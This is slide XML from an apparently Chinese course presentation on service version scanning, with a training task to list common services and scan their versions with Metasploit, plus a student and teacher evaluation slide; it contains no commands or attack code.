          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786245" y="6761480"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3171825" y="2599055"/>
            <a:ext cx="5534660" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.列出各种常见的服务。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.使用Metasploit进行服务版本扫描。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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17" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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a:xfrm>
            <a:off x="533756" y="1971129"/>
            <a:ext cx="4302496" cy="521035"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="4302496" cy="521035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7274400" y="1887541"/>
              <a:ext cx="1402080" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生自评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="3513239"/>
            <a:ext cx="4302496" cy="524299"/>
            <a:chOff x="6627851" y="3492048"/>
            <a:chExt cx="4302496" cy="524597"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3709766"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3492048"/>
              <a:ext cx="1402080" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生互评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="562331" y="4955527"/>
            <a:ext cx="4302496" cy="525366"/>
            <a:chOff x="6627851" y="5163977"/>
            <a:chExt cx="4302496" cy="525665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形: 圆角 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="5163977"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5382763"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 576"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5193635"/>
              <a:ext cx="2011680" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>教师综合评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 577"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="5210848"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目评价】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="矩形 29"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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31" name="矩形 30"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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32" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
